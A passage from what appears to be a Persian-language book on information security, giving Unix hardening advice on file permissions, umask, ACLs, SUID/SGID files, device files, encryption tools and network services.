‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ chgrp ،chown‬ﻭ ‪ chmod‬ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻓﺎﻳﻠﻬﺎ ﻭ ‪ ls‬ﺑﺮﺍﻱ ﻧﻤﺎﻳﺶ ﺍﻃﻼﻋﺎﺕ ﺩﺳﺘﺮﺳﻲ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﺑﻴﺎﻣﻮﺯﻳﺪ‪.‬‬
‫ﻣﺘﻐﻴﺮ ‪ umask‬ﺑﻪ ﺍﺯﺍﻱ ﻫﺮ ﻛﺎﺭﺑﺮ ﺩﺭ ‪ Unix‬ﻳﻚ ﻣﻘﺪﺍﺭ ﺩﺍﺭﺩ‪ .‬ﻣﻘﺪﺍﺭ ﺍﻳﻦ ﻣﺘﻐﻴﺮ ﺑﺮﺍﻱ ﻓﺎﻳﻠﻬﺎ ﻭ ﺷـﺎﺧﻪﻫـﺎﻳﻲ ﻛـﻪ ﻛـﺎﺭﺑﺮ ﺍﻳﺠـﺎﺩ ﻣـﻲﻛﻨـﺪ‬
‫ﻣﺠﻮﺯﻫﺎﻱ ﭘﻴﺶﻓﺮﺽ ﺭﺍ ﺗﻌﻴﻴﻦ ﻣﻲﻧﻤﺎﻳﺪ‪ .‬ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺩﺳﺘﻮﺭ ‪ umask‬ﺩﺭ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ﻭﺭﻭﺩ ﻛﺎﺭﺑﺮﺍﻥ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ ﺗـﺎ ﺍﺯ ﻣﻘـﺪﺍﺭﮔﻴﺮﻱ‬
‫ﻼ ﻣﻘﺪﺍﺭ ‪ 027‬ﻓﻘﻂ ﺑﻪ ﺳﺎﻳﺮﻳﻦ‪ ٣٤٧‬ﺩﺭﻭﻥ ﮔﺮﻭﻩ ﻛﺎﺭﺑﺮ‪ ،‬ﺍﺟﺎﺯﺓ ﺧﻮﺍﻧﺪﻥ ﻭ ﺍﺟﺮﺍ ﻭ ﻧﻪ ﺍﻳﺠﺎﺩ ﺗﻐﻴﻴـﺮ‬ ‫ﻣﻨﺎﺳﺐ ﺁﻥ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻣﻄﻤﺌﻦ ﺑﺎﺷﻴﺪ‪ .‬ﻣﺜ ﹰ‬
‫ﺩﺭ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﻣﻲﺩﻫﺪ ﻭ ﻣﻘﺪﺍﺭ ‪ 077‬ﺟﻠﻮﻱ ﺩﺳﺘﺮﺳﻲ ﻫﻤﻪ ﺑﻪ ﻓﺎﻳﻠﻬﺎ ﺑﻪ ﺟﺰ ﺧﻮﺩ ﻛﺎﺭﺑﺮ ﺭﺍ ﻣﻲﮔﻴﺮﺩ‪.‬‬
‫ﺑﺮﺧﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ Unix‬ﺍﻣﻜﺎﻥ ﺗﻌﺮﻳﻒ ﻓﻬﺮﺳﺘﻬﺎﻱ ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ )‪ (ACL‬ﺩﻗﻴﻘﺘﺮﻱ ﺑﺮﺍﻱ ﻓﺎﻳﻠﻬﺎ ﺩﺍﺭﻧﺪ‪ .‬ﺑﺎ ‪ACL‬ﻫﺎ ﻣﻲﺗـﻮﺍﻥ ﺍﺟـﺎﺯﻩ ﻭ‬
‫ﻋﺪﻡ ﺍﺟﺎﺯﺓ ﺗﻚ ﺗﻚ ﻛﺎﺭﺑﺮﺍﻥ ﺩﺭ ﺧﻮﺍﻧﺪﻥ‪ ،‬ﻧﻮﺷﺘﻦ‪ ،‬ﻭ ﺍﺟﺮﺍﻱ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﻣﺸﺨﺺ ﻛﺮﺩ‪ .‬ﺍﮔﺮ ﺳﻴﺴﺘﻢ ﺷـﻤﺎ ﺍﻣﻜـﺎﻥ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ‪ ACL‬ﺭﺍ ﺩﺍﺭﺩ‪،‬‬
‫ﻧﺤﻮﺓ ﻋﻤﻠﻜﺮﺩ ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﺮﺍ ﺑﻴﺎﻣﻮﺯﻳﺪ‪.‬‬
‫ﺑﺮﺧﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ Unix‬ﺍﻣﻜﺎﻥ ﺗﻌﺮﻳﻒ ﺻﻔﺎﺕ "ﺗﻐﻴﻴﺮﻧﺎﭘﺬﻳﺮ" ﻭ "ﻓﻘﻂ ﺍﺿﺎﻓﻪﻛﺮﺩﻧﻲ" ﺑﺮﺍﻱ ﻓﺎﻳﻠﻬﺎ ﺩﺍﺭﻧﺪ‪ .‬ﻳﻚ ﻓﺎﻳﻞ ﺗﻐﻴﻴﺮﻧﺎﭘﺬﻳﺮ ﺭﺍ ﺣﺘـﻲ ﺑـﺎ‬
‫ﻛﺎﺭﺑﺮ ‪ root‬ﻫﻢ ﻧﻤﻲﺗﻮﺍﻥ ﺗﻐﻴﻴﺮ ﺩﺍﺩ‪ ،‬ﻣﮕﺮ ﺁﻧﻜﻪ ﺳﻴﺴﺘﻢ ﺭﺍ ﺩﺭ ﺣﺎﻟـﺖ ﺍﻣﻨﻴـﺖ ﭘـﺎﻳﻴﻦ ﻭ ﺍﺯ ﻃﺮﻳـﻖ ﺧـﻮﺩ ﭘﺎﻳﺎﻧـﺔ ﺁﻥ )ﻭ ﻧـﻪ ﺩﺳﺘﺮﺳـﻲ ﺭﺍﻩ ﺩﻭﺭ(‬
‫ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ‪ .‬ﺩﺭ ﻓﺎﻳﻠﻬﺎﻱ ﻓﻘﻂ ﺍﺿﺎﻓﻪﻛﺮﺩﻧﻲ ﺗﻨﻬﺎ ﻣﻲﺗﻮﺍﻥ ﻣﻄﺎﻟﺒﻲ ﺑﻪ ﺍﻧﺘﻬﺎﻱ ﻓﺎﻳﻞ ﺍﺿﺎﻓﻪ ﻛﺮﺩ ﻭ ﺍﻳﻦ ﻓﺎﻳﻠﻬﺎ ﺑﻪ ﺷـﻜﻞ ﺩﻳﮕـﺮﻱ‬
‫ﻗﺎﺑﻞ ﺗﻐﻴﻴﺮ ﻳﺎ ﺣﺬﻑ ﻧﻴﺴﺘﻨﺪ‪ .‬ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﻛﺎﻧﺪﻳﺪﺍﻫﺎﻱ ﺧﻮﺑﻲ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ ﺻﻔﺖ ﻣﻲﺑﺎﺷﻨﺪ‪ .‬ﺍﮔﺮ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺘﻬﺎ ﺭﺍ ﺩﺍﺭﺩ‬
‫ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪.‬‬
‫ﺩﺭ ‪ Unix‬ﻓﺎﻳﻠﻬﺎﻳﻲ ﻛﻪ ﺩﺍﺭﺍﻱ ﻣﺠﻮﺯ ‪ (SUID) setuid‬ﺑﺎﺷﻨﺪ ﺑﺎ ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮﻱ "ﻣﺎﻟﻚ" ﺧﻮﺩ ﺍﺟﺮﺍ ﻣﻲﺷﻮﻧﺪ ﻭ ﻧﻪ ﻛﺎﺭﺑﺮﻱ ﻛﻪ‬
‫ﺁﻧﻬﺎ ﺭﺍ ﺍﺟﺮﺍ ﻣﻲﻛﻨﺪ‪ .‬ﻛﺎﺭﺑﺮ ﻓﺎﻳﻠﻬﺎﻱ ‪ SUID‬ﻣﻲﺗﻮﺍﻧﺪ ﺩﺳﺘﻮﺭﺍﺗﻲ ﺍﺟﺮﺍ ﻛﻨﺪ ﻛﻪ ﻧﻴﺎﺯ ﺑﻪ ﺍﻣﺘﻴﺎﺯﺍﺕ ﻳﻚ ﻛﺎﺭﺑﺮ ﺩﻳﮕﺮ )ﻣﻌﻤـﻮ ﹰﻻ ‪ (root‬ﺩﺍﺭﻧـﺪ ﻭ ﺑـﻪ‬
‫ﻲ ﮔﺮﻭﻩ ﺧﻮﺩ ﺍﺟﺮﺍ ﻣﻲﺷﻮﻧﺪ ﻭ‬ ‫ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﺍﻳﻦ ﻓﺎﻳﻠﻬﺎ ﻳﻚ ﻧﻘﻄﺔ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﻣﻲﺑﺎﺷﻨﺪ‪ .‬ﻓﺎﻳﻠﻬﺎﻱ ‪ (SGID) setgid‬ﺑﺎ ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﮔﺮﻭﻫ ﹺ‬
‫ﻧﻪ ﮔﺮﻭﻩ ﻛﺎﺭﺑﺮﻱ ﻛﻪ ﺁﻧﻬﺎ ﺭﺍ ﺍﺟﺮﺍ ﻣﻲﻛﻨﺪ‪ .‬ﺷﻤﺎ ﺑﺎﻳﺪ ﻣﺘﻨﺎﻭﺑﹰﺎ ﻓﺎﻳﻠﻬﺎﻱ ‪ SUID‬ﻭ ‪ SGID‬ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﻭ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛـﻪ‬
‫ﺩﺭ ﻣﻮﺭﺩ ﻫﺮﻳﻚ ﺍﺯ ﺁﻧﻬﺎ ﻣﻲﺩﺍﻧﻴﺪ ﭼﺮﺍ ﺑﺎ ﺍﻳﻦ ﻣﺠﻮﺯﻫﺎ ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ‪ .‬ﭘﻴﺸﻨﻬﺎﺩ ﻣﻲﺷﻮﺩ ﻫﻤﻮﺍﺭﻩ ﻳـﻚ ﻧـﺴﺨﺔ ﭼـﺎﭘﻲ ﺍﺯ ﺁﻧﻬـﺎ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ‪.‬‬
‫ﺧﻮﺩﺗﺎﻥ ﻫﻴﭽﮕﺎﻩ ﺑﺮﻧﺎﻣﻪ ﻳﺎ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﭘﻮﺳﺘﻪﺍﻱ ﺭﺍ ﺑﺼﻮﺭﺕ ‪ SUID‬ﻳﺎ ‪ SGID‬ﻧﻨﻮﻳـﺴﻴﺪ‪ .‬ﺑﺮﺧـﻲ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻓﺎﻳـﻞ ﺭﺍ ﻣـﻲﺗـﻮﺍﻥ‬
‫ﺑﮕﻮﻧﻪﺍﻱ ‪ mount‬ﻛﺮﺩ ﻛﻪ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ‪ SUID‬ﻭ ‪ SGID‬ﺩﺭ ﺁﻧﻬﺎ ﻏﻴﺮﻓﻌﺎﻝ ﺑﺎﺷﺪ )ﺑﺼﻮﺭﺕ ‪ Mount .(nosuid‬ﻛﺮﺩﻥ ﺷﺎﺧﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻭ‬
‫ﺳﺎﻳﺮ ﺑﺨﺸﻬﺎﻱ ﻏﻴﺮﺳﻴﺴﺘﻤﻲ ﺑﻪ ﺍﻳﻦ ﺻﻮﺭﺕ ﺭﺍﻩﺣﻞ ﻣﻨﺎﺳﺒﻲ ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺍﻳﻦ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺍﺳﺖ‪.‬‬

‫‪347 Others‬‬
‫‪٤٤٣‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫‪ Unix‬ﺑﺎ ﺗﻤﺎﻡ ﻭﺳﺎﻳﻞ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺼﻮﺭﺕ ﻳﻚ ﻓﺎﻳﻞ ﺑﺮﺧﻮﺭﺩ ﻣﻲﻛﻨﺪ‪ .‬ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﻣﻲﺗـﻮﺍﻥ ﺑـﻪ ﭼﺎﭘﮕﺮﻫـﺎ‪ ،‬ﭘﻮﺭﺗﻬـﺎﻱ ﺳـﺮﻳﺎﻝ‪ ،‬ﺩﻳـﺴﻜﻬﺎﻱ‬
‫ﺳﺨﺖ‪ ،‬ﻭ ﺣﺘﻲ ﺣﺎﻓﻈﺔ ﺳﻴﺴﺘﻢ ﺍﺯ ﻃﺮﻳﻖ ﻓﺎﻳﻠﻬﺎﻱ ﻭﺳﻴﻠﻪ‪ ٣٤٨‬ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺖ‪ .‬ﻫﺮﭼﻨﺪ ﻓﺎﻳﻠﻬﺎﻱ ﻭﺳﻴﻠﻪ ﻋﻤﻮﻣﹰﺎ ﺩﺭ ﺷﺎﺧﺔ ‪ /dev‬ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ‪،‬‬
‫ﺍﻣﺎ ﻛﺎﺭﺑﺮﻱ ﻛﻪ ﺩﺍﺭﺍﻱ ﺍﻣﺘﻴﺎﺯﺍﺕ ﻛﺎﻓﻲ ﺑﺎﺷﺪ )ﻣﻌﻤﻮ ﹰﻻ ﺍﺑﺮﻛﺎﺭﺑﺮ( ﻣﻲﺗﻮﺍﻧﺪ ﺁﻧﻬﺎ ﺭﺍ ﺩﺭ ﻫﺮ ﺟﺎﻳﻲ ﺑﺴﺎﺯﺩ‪ .‬ﺍﮔﺮ ﻳﻚ ﻛﺎﺭﺑﺮ ﻏﻴﺮﻣﺠﺎﺯ ﺑﺘﻮﺍﻧﺪ ﺍﺯ ﺣﺎﻓﻈـﺔ‬
‫ﺳﻴﺴﺘﻢ ﺑﺨﻮﺍﻧﺪ‪ ،‬ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺱ ﺳﺎﻳﺮ ﻛﺎﺭﺑﺮﺍﻥ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﻨﺪ؛ ﻭ ﺍﮔـﺮ ﺑﺘﻮﺍﻧـﺪ ﺩﺭ ﺣﺎﻓﻈـﺔ ﺳﻴـﺴﺘﻢ ﺑﻨﻮﻳـﺴﺪ‪ ،‬ﻣـﻲﺗﻮﺍﻧـﺪ‬
‫ﺳﻴﺴﺘﻢ ﺭﺍ ﺩﺳﺘﻜﺎﺭﻱ ﻧﻤﺎﻳﺪ‪ .‬ﺩﺭ ﻣﻮﺭﺩ ﻭﺳﺎﻳﻠﻲ ﻛﻪ ﺑﺼﻮﺭﺕ ﺧﺎﻡ )ﺑﺪﻭﻥ ﺩﺧﺎﻟﺖ ﺳﻴـﺴﺘﻢ ﻓﺎﻳـﻞ( ﺩﺍﺩﻩﻫـﺎﻱ ﺩﻳـﺴﻚ ﺭﺍ ﺩﺳـﺘﻜﺎﺭﻱ ﻣـﻲﻛﻨﻨـﺪ ﻭ‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﻳﺮ ﺍﻧﻮﺍﻉ ﻭﺳﺎﻳﻞ ﻧﻴﺰ ﺑﺎﻳﺪ ﺍﺣﺘﻴﺎﻃﻬﺎﻱ ﻣﺸﺎﺑﻬﻲ ﺭﺍ ﺍﻋﻤﺎﻝ ﻛﺮﺩ‪ .‬ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ ﻭﺍﺭﺳﻲ ﻛﻨﻴﺪ ﻭ ﻣﻄﻤﺌﻦ ﺷـﻮﻳﺪ ﻛـﻪ ﻣﺎﻟﻜﻴـﺖ ﻭ‬
‫ﻣﺠﻮﺯﻫﺎﻱ ﻓﺎﻳﻠﻬﺎﻱ ﻭﺳﻴﻠﻪ‪ ،‬ﺻﺤﻴﺢ ﻫﺴﺘﻨﺪ‪ .‬ﺍﮔﺮ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ ﺧﻮﺩ ﺭﺍ ﺑﮕﻮﻧﻪﺍﻱ ‪ mount‬ﻛﻨﻴﺪ ﻛﻪ ﻭﺳﺎﻳﻞ ﺩﺭ ﺁﻥ ﻏﻴﺮﻓﻌﺎﻝ ﺑﺎﺷﺪ‬
‫)ﺑـﺼﻮﺭﺕ ‪ ،(nodev‬ﺩﺭ ﺷﺮﺍﻳﻄﻲ ﻛﻪ ﺍﻣﻜـﺎﻥ ﺁﻥ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﺍﺯ ﺍﻳـﻦ ﻭﻳﮋﮔـﻲ ﺍﺳـﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴـﺪ‪ .‬ﺩﺭ ﺑﺮﺧـﻲ ﺳﻴـﺴﺘﻤﻬﺎ ﻳـﻚ ﻓﺎﻳـﻞ ﺑـﻪ ﻧـﺎﻡ‬
‫‪ logindevperm‬ﻳﺎ ‪ fbtab‬ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻛﻨﺘﺮﻝ ﻣﻲﻛﻨﺪ ﻭﻗﺘﻲ ﻛﺎﺭﺑﺮﻱ ﺍﺯ ﺧﻮﺩ ﭘﺎﻳﺎﻧﻪ )ﻭ ﻧﻪ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ( ﻭﺍﺭﺩ ﺭﺍﻳﺎﻧﻪ ﻣﻲﺷـﻮﺩ‪ ،‬ﻣﺠﻮﺯﻫـﺎﻱ‬
‫ﻭﺳﺎﻳﻞ ﭼﮕﻮﻧﻪ ﺗﻐﻴﻴﺮ ﻣﻲﻛﻨﻨﺪ )ﻣﺜ ﹰﻼ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺍﻳﻨﻜﻪ ﻳﻚ ﻛﺎﺭﺑﺮ ﺭﺍﻩ ﺩﻭﺭ ﻧﺘﻮﺍﻧﺪ ﻣﻴﻜﺮﻭﻓﻮﻥ ﺭﺍ ﺭﻭﺷﻦ ﻛﻨﺪ ﻭ ﺍﺗﺎﻕ ﺭﺍ ﺗﺤﺖ ﻧﻈـﺮ ﺑﮕﻴـﺮﺩ(‪ .‬ﺍﮔـﺮ ﭼﻨـﻴﻦ‬
‫ﻓﺎﻳﻠﻲ ﺩﺭ ﺳﻴﺴﺘﻢ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺍﺯ ﺗﻨﻈﻴﻤﺎﺕ ﺻﺤﻴﺢ ﺁﻥ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ‪.‬‬

‫ﺭﻣﺰﮔﺬﺍﺭﻱ‬
‫ﺩﺳﺘﻮﺭﺍﺕ ﻣﺘﻌﺪﺩﻱ ﺩﺭ ‪ Unix‬ﺑﺮﺍﻱ ﻏﻴﺮﻗﺎﺑﻞ ﺧﻮﺍﻧﺪﻥ ﻛﺮﺩﻥ ﺩﺍﺩﻩﻫﺎ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ‪ ،‬ﻭﻟﻲ ﺑـﺮﺍﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﻣﻨﺎﺳـﺐ ﻧﻴـﺴﺘﻨﺪ‪ .‬ﺍﺯ ‪ rot13‬ﻳـﺎ‬
‫‪ crypt‬ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻴﺪ‪ ،‬ﭼﻮﻥ ﺑﺮﺍﺣﺘﻲ ﺷﻜﺴﺘﻪ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺯﻳﺎﺩﻱ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺩﺳﺘﻮﺭ ‪ des‬ﻳﺎ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﻭ ﻛﺘﺎﺑﺨﺎﻧـﻪﻫـﺎﻱ‬
‫‪ openssl‬ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﻳﻚ ﺭﻭﺵ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺴﺘﺤﻜﻢ ﺩﺳﺖ ﻳﺎﻓﺖ‪ .‬ﺑﺮﺍﻱ ﺍﺳﺘﺤﮑﺎﻡ ﺑﻴﺸﺘﺮ ﺳﺮﺟﻤﻊﻫﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﺩﺳـﺘﻮﺭ ‪ sum‬ﺍﺗﻜـﺎ‬
‫ﻧﻜﻨﻴﺪ ﻭ ﺩﺭﻋﻮﺽ ﺑﺮﺍﻱ ﺗﻮﻟﻴﺪ ﺧﻼﺻﻪﻫﺎﻱ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺍﺯ ‪ ،md5sum ،md5‬ﻳﺎ ‪ openssl‬ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ‪.‬‬

‫ﺷﺒﻜﻪﻫﺎﻱ ‪TCP/IP‬‬

‫ﻏﺎﻟﺒﹰﺎ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ Unix‬ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺩﻫﺎ ﻭ ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷـﻮﺩ‪ .‬ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺧـﺪﻣﺎﺕ ﺷـﺒﻜﻪ ﺗﻮﺳـﻂ ‪) inetd‬ﻳـﺎ ‪(xinetd‬‬
‫ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻣﻲﺷﻮﻧﺪ‪ .‬ﻓﺎﻳﻠﻬﺎﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺍﻳﻦ ‪ daemon‬ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﻭ ﺧﺪﻣﺎﺕ ﻏﻴﺮﺿﺮﻭﺭﻱ ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻧﻤﺎﻳﻴﺪ؛ ﺳـﺎﻳﺮ ﺧـﺪﻣﺎﺕ ﺭﺍ ﺑـﺎ‬
‫ﻳﮏ ‪ tcpwapper daemon‬ﺑﻪ ﻧﺎﻡ ‪ tcpd‬ﻣﺤﺎﻓﻈﺖ ﻛﻨﻴﺪ‪ ،‬ﻣﮕﺮ ﺩﺭ ﺣﺎﻟﺘﻲ ﻛﻪ ‪ inetd‬ﺧﻮﺩﺵ ﺍﺯ ﭘﻮﺷﺸﻬﺎﻱ ‪ TCP‬ﭘﺸﺘﻴﺒﺎﻧﻲ ﻛﻨﺪ‪.‬‬
‫ﻫﻨﮕﺎﻡ ﺭﻭﺷﻦﺷﺪﻥ ﺳﻴﺴﺘﻢ‪ ،‬ﺳﺎﻳﺮ ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪ ﺍﺯ ﻃﺮﻳﻖ ﻓﺎﻳﻠﻬﺎﻱ ﺩﺭﻭﻥ ﺷﺎﺧﻪﻫﺎﻱ ‪ /etc/init.d‬ﻳﺎ ‪ /etc/rc*.d‬ﻳﺎ ﻓﺎﻳﻠﻬـﺎﻱ ‪/etc/rc‬‬
‫ﻭ ‪ /etc/rc.local‬ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺍﮔﺮ ﺍﺯ ﺳﺮﻭﻳﺴﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻲﻛﻨﻴﺪ ﺁﻧﺮﺍ ﻏﻴﺮﻓﻌﺎﻝ ﺳﺎﺯﻳﺪ‪ .‬ﺑﻪ ﺧﺪﻣﺎﺗﻲ ﻣﺜﻞ ‪ fingerd‬ﻛﻪ ﺩﺭ ﺭﺍﺑﻄـﻪ‬
‫ﺑﺎ ﺳﻴﺴﺘﻢ ﻳﺎ ﻛﺎﺭﺑﺮﺍﻥ ﺁﻥ ﺑﻪ ﺍﻓﺮﺍﺩ ﺑﻴﺮﻭﻧﻲ ﺍﻃﻼﻋﺎﺕ ﻣﻲﺩﻫﻨﺪ ﺗﻮﺟﻪ ﺧﺎﺹ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪.‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﻫﺮ ﺳﻴﺴﺘﻢ ‪ Unix‬ﺑﺮﺍﻱ ﻏﺮﺑﺎﻝ ﻛﺮﺩﻥ ﺑﺴﺘﻪﻫﺎ ﺑﺎﻳﺪ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﻴﺰﺑﺎﻥ ﻣﺨﺼﻮﺹ ﺑﻪ ﺧـﻮﺩ ﺭﺍ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ‪ .‬ﺑـﺮﺍﻱ ﺍﻃـﻼﻉ ﺍﺯ‬
‫ﻭﺟﻮﺩ ﻭ ﻧﺤﻮﺓ ﺑﻜﺎﺭﮔﻴﺮﻱ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺩﺭ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺑﻪ ﻣﺴﺘﻨﺪﺍﺕ ﺁﻥ ﺭﺟﻮﻉ ﻛﻨﻴﺪ‪ .‬ﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﻌﻤﻮﻝ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻋﺒﺎﺭﺗﻨـﺪ ﺍﺯ‬
‫‪ ipchains ،ipfw‬ﻭ ‪ .iptables‬ﺍﻳﻦ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﺭﺍ ﺑﺎﻳﺪ ﻃﻮﺭﻱ ﺗﻨﻈﻴﻢ ﻛﺮﺩ ﻛـﻪ ﻓﻘـﻂ ﺑـﻪ ﺑـﺴﺘﻪﻫـﺎﻳﻲ ﺍﺟـﺎﺯﻩ ﻋﺒـﻮﺭ ﺩﻫﻨـﺪ ﻛـﻪ‬
‫ﻣﻘﺼﺪﺷﺎﻥ ﺧﺪﻣﺎﺗﻲ ﺑﺎﺷﺪ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻴﺪ ﺍﺭﺍﺋﻪ ﺩﻫﻴﺪ‪ .‬ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺩﺳﺘﺮﺳﻲ ﺍﻓﺮﺍﺩ ﺑﻴﺮﻭﻧﻲ ﺑﻪ ﭘﺮﻭﺗﻜﻠﻬﺎ ﻭ ﺧﺪﻣﺎﺗﻲ ﻛﻪ ﺩﺭﻭﻥ ﺳﺎﺯﻣﺎﻥ‬
‫ﺧﻮﺩ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﻴﺪ )ﻣﺎﻧﻨﺪ ‪ (RIP ،Samba ،LPD ،NTP ،NFS ،SNMP‬ﻧﻴﺰ ﺑﺎﻳﺪ ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺧﺎﺭﺟﻲ ﺑﻪ ﻛـﺎﺭ ﮔﺮﻓﺘـﻪ ﺷـﻮﺩ‪ .‬ﺩﺭﺻـﻮﺭﺕ‬
‫ﺍﻣﻜﺎﻥ ﺍﺯ ﻣﺴﻴﺮﻳﺎﺑﻲ ﺍﻳﺴﺘﺎ‪ ٣٤٩‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪.‬‬
‫ﺩﺭ ﮔﺬﺷﺘﻪ ﺧﺪﻣﺎﺕ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺯﻳﺎﺩﻱ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﺯ ﻧﺎﻡ ﻣﻴﺰﺑﺎﻥ ﻳﺎ ﺁﺩﺭﺱ ‪ IP‬ﻣﺸﺘﺮﻱ ﻭ ﻳﺎ ﺑﺎ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭﻱ ﻛﻪ ﺑـﺼﻮﺭﺕ‬
